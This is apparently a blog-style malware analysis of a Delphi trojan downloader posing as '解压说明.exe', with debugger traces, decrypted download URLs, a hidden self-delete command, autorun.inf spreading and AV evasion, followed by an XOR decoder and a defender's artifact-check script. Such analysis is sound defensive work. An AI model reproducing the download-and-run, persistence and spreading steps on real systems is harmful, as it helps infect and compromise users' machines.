Sample: http://www.scanw.com/blog/archives/77 - 解压说明.exe
;*****************************************************************************************
;**********************************thanks cyto******************************************
;*****************************************************************************************
1.OEP
The OEP has been tampered with. EP:
004115A1 > $ 55 push ebp
004115A2 . 8BEC mov ebp,esp
004115A4 . 50 push eax
004115A5 . 58 pop eax
004115A6 . 90 nop
004115A7 . 90 nop
004115A8 . 41 inc ecx
004115A9 . 49 dec ecx
004115AA . 90 nop
004115AB . 90 nop
004115AC . 50 push eax
004115AD . 58 pop eax
004115AE . 90 nop
004115AF . 90 nop
004115B0 . 90 nop
004115B1 . 90 nop
004115B2 . EB 29 jmp short 解压说明.004115DD
Right below it is the Borland Delphi OEP signature: 55 8B EC B9 34 00 00 00
004115B8 > /55 push ebp
004115B9 . |8BEC mov ebp,esp
004115BB . |B9 34000000 mov ecx,34
004115C0 .^|E9 8BEEFFFF jmp 解压说明.00410450
This is the fOEP:
00410450 > /6A 00 push 0 ; fOEP
00410452 . |6A 00 push 0
00410454 . |49 dec ecx
00410455 .^ 75 F9 jnz short 解压说明.00410450
00410457 . |51 push ecx
00410458 . |53 push ebx
You can see the first 8 bytes were nop'd out; restore them:
55 8B EC B9 34 00 00 00
Fixed.
2. String decryption: 004104C1 E8 8E7DFFFF call 解压说明.00408254
call 0040654C
堆栈 ss:[0012D578]=00C8290C, (ASCII “hxxp://www.webweb.com/ReadDown.txt”)
edx=00C828A8, (ASCII “mvqr?-*uru+u“rgg,fmh-WgdfAmrl+v}v”)
堆栈 ss:[0012D568]=00C829C0, (ASCII “hxxp://www.cbirds.cn/qqwww/uu.exe”)
edx=00C82970, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*wp,`z`”)
堆栈 ss:[0012D560]=00C82A40, (ASCII “hxxp://www.cbirds.cn/qqwww/1.exe”)
edx=00C829F0, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*3+g}g”)
堆栈 ss:[0012D558]=00C82AC0, (ASCII “hxxp://www.cbirds.cn/qqwww/2.exe”)
edx=00C82A70, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*0+g}g”)
堆栈 ss:[0012D550]=00C82B40, (ASCII “hxxp://www.cbirds.cn/qqwww/3.exe”)
edx=00C82AF0, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*1+g}g”)
堆栈 ss:[0012D520]=00C82D50, (ASCII “hxxp://www.cbirds.cn/qqwww/4.exe”)
edx=00C82CEC, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*6+g}g”)
堆栈 ss:[0012D518]=00C82DE4, (ASCII “hxxp://www.cbirds.cn/qqwww/5.exe”)
edx=00C82D80, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*7+g}g”)
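The decryption scheme behind the call above, reconstructed here as an added example (not code from the original post or from the sample itself): every encrypted/decrypted pair listed is consistent with a repeating 2-byte XOR key 05 02 applied by byte position. The key is inferred from those pairs rather than read out of the routine at 00408254, and the two backticks in the first sample are assumed where the page renders a curly quote.

```python
# Added example, not code from the original post: the string scheme behind the
# call at 004104C1, reconstructed from the encrypted/decrypted pairs listed above.
# Every pair is consistent with a repeating 2-byte XOR key 05 02 applied by
# position. That key is inferred from the pairs, not read out of 00408254.
KEY = bytes([0x05, 0x02])


def xor_decode(enc: str, key: bytes = KEY) -> str:
    """XOR byte i with key[i % len(key)]. The scheme is its own inverse."""
    data = enc.encode("latin-1")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).decode("latin-1")


def xor_encode(plain: str, key: bytes = KEY) -> str:
    """Same operation; kept separate only so round-trip checks read clearly."""
    return xor_decode(plain, key)


def defang(url: str) -> str:
    """Render decoded URLs the way the post does (hxxp://) so they are not live links."""
    return url.replace("http", "hxxp", 1)


# Encrypted strings as they appeared in edx before the call (taken from the post).
# The first one is shown on the page with a curly quote where two backticks sit;
# two backticks is what the key maps the plaintext "eb" to, so that is assumed here.
SAMPLES = [
    "mvqr?-*uru+u``rgg,fmh-WgdfAmrl+v}v",  # -> .../ReadDown.txt
    "mvqr?-*uru+agkwfv,fl*sturu*wp,`z`",   # -> .../qqwww/uu.exe
    "mvqr?-*uru+agkwfv,fl*sturu*3+g}g",    # -> .../qqwww/1.exe
]


def decode_all(samples=SAMPLES) -> list:
    """Decode and defang every sample, in order."""
    return [defang(xor_decode(s)) for s in samples]


if __name__ == "__main__":
    for s, url in zip(SAMPLES, decode_all()):
        print(f"{s!r:40} -> {url}")
```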
3. Check whether the running process name is GOODIYA.EXE:
00410518 8B55 E0 mov edx,dword ptr ss:[ebp-20]
0041051B 58 pop eax
0041051C E8 C338FFFF call 解压说明.00403DE4
00410521 0F85 A5010000 jnz 解压说明.004106CC
It goes through each drive one by one:
堆栈 ss:[0012FF98]=00C82FEC, (ASCII “C:\GOODIYA.EXE”)
…
堆栈 ss:[0012FF98]=00C8375C, (ASCII “Z:\GOODIYA.EXE”)
If it is, it runs it directly.
4. Compare whether the process is one of the following programs:
004107EB 8B55 88 mov edx,dword ptr ss:[ebp-78]
004107EE 58 pop eax
004107EF E8 F035FFFF call 解压说明.00403DE4
004107F4 0F84 16060000 je 解压说明.00410E10
C:\PROGRAM FILES\COMMON FILES\SYSTEM\PJNQBQE.EXE
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\MAUJQYF.EXE
If not, it copies itself:
0012FDEC 00410CCD /CALL 到 CopyFileA 来自 解压说明.00410CC8
0012FDF0 00C80034 |ExistingFileName = “C:\Documents and Settings\gao1\桌面\解压说明.exe”
0012FDF4 00C80480 |NewFileName = “C:\Program Files\Common Files\System\pjnqbqe.exe”
0012FDF8 FFFFFFFF \FailIfExists = TRUE
0012FDEC 00410D17 /CALL 到 CopyFileA 来自 解压说明.00410D12
0012FDF0 00C80034 |ExistingFileName = “C:\Documents and Settings\gao1\桌面\解压说明.exe”
0012FDF4 00C80514 |NewFileName = “C:\Program Files\Common Files\Microsoft Shared\maujqyf.exe”
0012FDF8 FFFFFFFF \FailIfExists = TRUE
And executes them:
0012FDF0 00410D54 /CALL 到 WinExec 来自 解压说明.00410D4F
0012FDF4 00C805A8 |CmdLine = “C:\Program Files\Common Files\System\pjnqbqe.exe”
0012FDF8 00000001 \ShowState = SW_SHOWNORMAL
0012FDF0 00410D91 /CALL 到 WinExec 来自 解压说明.00410D8C
0012FDF4 00C8063C |CmdLine = “C:\Program Files\Common Files\Microsoft Shared\maujqyf.exe”
0012FDF8 00000001 \ShowState = SW_SHOWNORMAL
Deletes itself (apart from the GOODIYA.EXE in the drive root):
0012FCC8 00405FA9 /CALL 到 WinExec 来自 解压说明.00405FA4
0012FCCC 00C83D80 |CmdLine = "C:\WINNT\system32\cmd.exe /c del "C:\Documents and Settings\gao1\桌面\解压说明.exe""
0012FCD0 00000000 \ShowState = SW_HIDE
5. What PJNQBQE.EXE or MAUJQYF.EXE does:
5.1 If it is PJNQBQE.EXE:
0012FDE0 00411025 /CALL 到 CreateThread 来自 解压说明.00411020
0012FDE4 00000000 |pSecurity = NULL
0012FDE8 00000000 |StackSize = 0
0012FDEC 0040BDE0 |ThreadFunction = 解压说明.0040BDE0 ; deals with avp
0012FDF0 00000000 |pThreadParm = NULL
0012FDF4 00000000 |CreationFlags = 0
0012FDF8 004136DC \pThreadId = 解压说明.004136DC
0012FDE8 00411038 /CALL 到 SetTimer 来自 解压说明.00411033
0012FDEC 00000000 |hWnd = NULL
0012FDF0 00000000 |TimerID = 0
0012FDF4 00000514 |Timeout = 1300. ms
0012FDF8 0040FBC4 \Timerproc = 解压说明.0040FBC4 ; writes the registry
0040FDA4=解压说明.0040FDA4 (ASCII “Software\Microsoft\Windows\CurrentVersion\Run”)
0012FDE8 00411053 /CALL 到 SetTimer 来自 解压说明.0041104E
0012FDEC 00000000 |hWnd = NULL
0012FDF0 00000000 |TimerID = 0
0012FDF4 00001388 |Timeout = 5000. ms
0012FDF8 00410078 \Timerproc = 解压说明.00410078 ; writes autorun.inf and GOODIYA.EXE
0012FDE8 0041106E /CALL 到 SetTimer 来自 解压说明.00411069
0012FDEC 00000000 |hWnd = NULL
0012FDF0 00000000 |TimerID = 0
0012FDF4 00000898 |Timeout = 2200. ms
0012FDF8 00410090 \Timerproc = 解压说明.00410090 ; evades a pile of AV products
0012FDE8 004110A4 /CALL 到 SetTimer 来自 解压说明.0041109F
0012FDEC 00000000 |hWnd = NULL
0012FDF0 00000000 |TimerID = 0
0012FDF4 00000000 |Timeout = 0. ms
0012FDF8 0040B8E4 \Timerproc = 解压说明.0040B8E4 ; downloads malware
5.2 If it is MAUJQYF.EXE:
004112EF A1 3C254100 mov eax,dword ptr ds:[41253C]
004112F4 50 push eax
004112F5 6A 00 push 0
004112F7 6A 00 push 0
004112F9 68 9CF34000 push 解压说明.0040F39C ; evades AV
004112FE 6A 00 push 0
00411300 6A 00 push 0
00411302 E8 B533FFFF call <jmp.&kernel32.CreateThread>
00411307 A1 44254100 mov eax,dword ptr ds:[412544]
0041130C 50 push eax
0041130D 6A 00 push 0
0041130F 6A 00 push 0
00411311 68 04B24000 push 解压说明.0040B204 ; downloads files, runs them, then deletes them
00411316 6A 00 push 0
00411318 6A 00 push 0
0041131A E8 9D33FFFF call <jmp.&kernel32.CreateThread>
It downloads from each of the addresses decrypted above in turn, as follows:
011DFF60 00C84050 ASCII “hxxp://www.cbirds.cn/qqwww/uu.exe”
011DFF64 00C80210 ASCII “C:\Program Files\1Awww.cbirds.cn/qqwww/uu.exe”
0041131F 68 28FE4000 push 解压说明.0040FE28 ; runs PJNQBQE.EXE, closes the taskmgr.exe window
00411324 68 14050000 push 514
00411329 6A 00 push 0
0041132B 6A 00 push 0
0041132D E8 FA34FFFF call <jmp.&user32.SetTimer>
00411332 8B15 40254100 mov edx,dword ptr ds:[412540] ; 解压说明.00413ED0
00411338 8902 mov dword ptr ds:[edx],eax
0041133A 68 6C004100 push 解压说明.0041006C ; writes autorun.inf and GOODIYA.EXE to each drive
0041133F 68 70170000 push 1770
00411344 6A 00 push 0
00411346 6A 00 push 0
00411348 E8 DF34FFFF call <jmp.&user32.SetTimer>
0041134D 8B15 50254100 mov edx,dword ptr ds:[412550] ; 解压说明.00413ED4
00411353 8902 mov dword ptr ds:[edx],eax
00411355 68 60034100 push 解压说明.00410360 ; evades AV
0041135A 68 E8030000 push 3E8
0041135F 6A 00 push 0
00411361 6A 00 push 0
00411363 E8 C434FFFF call <jmp.&user32.SetTimer>
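A defender's host check for the artifacts described in sections 3 to 5, added here as an example (not code from the original post): the two drop paths, GOODIYA.EXE and autorun.inf in every drive root come from the analysis above, while the C:..Z: walk, the injected `exists` callable and the autorun.inf parsing (assuming the autorun.inf points at GOODIYA.EXE) are assumptions so the check can be exercised offline against a constructed file list.

```python
# Added example, not code from the original post: a defender's host check for the
# artifacts this dropper leaves behind. The two drop paths, GOODIYA.EXE and
# autorun.inf in every drive root come from the analysis above; the C:..Z: walk,
# the injected `exists` callable and the autorun.inf parsing are assumptions so
# the check can be exercised offline against a constructed file list.
import re
import string
from typing import Callable, Dict, Iterable, List

DROP_PATHS = [
    r"C:\Program Files\Common Files\System\pjnqbqe.exe",
    r"C:\Program Files\Common Files\Microsoft Shared\maujqyf.exe",
]
ROOT_ARTIFACTS = ["GOODIYA.EXE", "autorun.inf"]

# autorun.inf keys that can launch a program when the drive is mounted.
_LAUNCH_KEY = re.compile(
    r"^\s*(open|shellexecute|shell\\[^=]*\\command)\s*=\s*(.+?)\s*$",
    re.IGNORECASE | re.MULTILINE,
)

def root_paths(drive_letters: Iterable[str] = string.ascii_uppercase) -> List[str]:
    """'<X>:\\GOODIYA.EXE' and '<X>:\\autorun.inf' per drive, mirroring the sample's own walk."""
    return [f"{d}:\\{name}" for d in drive_letters for name in ROOT_ARTIFACTS]

def find_artifacts(exists: Callable[[str], bool],
                   drive_letters: Iterable[str] = string.ascii_uppercase) -> List[str]:
    """Every known artifact path for which exists() reports True, in check order."""
    return [p for p in DROP_PATHS + root_paths(drive_letters) if exists(p)]

def autorun_launch_targets(text: str) -> Dict[str, str]:
    """Map each launch key in an autorun.inf body to the command it would run."""
    return {k.lower(): v for k, v in _LAUNCH_KEY.findall(text)}

def autorun_is_suspicious(text: str) -> bool:
    """True when any launch key points at the dropper's root copy (assumed name)."""
    return any("goodiya.exe" in cmd.lower()
               for cmd in autorun_launch_targets(text).values())

if __name__ == "__main__":
    import os
    for hit in find_artifacts(os.path.exists):
        note = ""
        if hit.lower().endswith("autorun.inf"):
            with open(hit, errors="replace") as fh:
                note = "  (launches GOODIYA.EXE)" if autorun_is_suspicious(fh.read()) else ""
        print("suspicious:", hit + note)
```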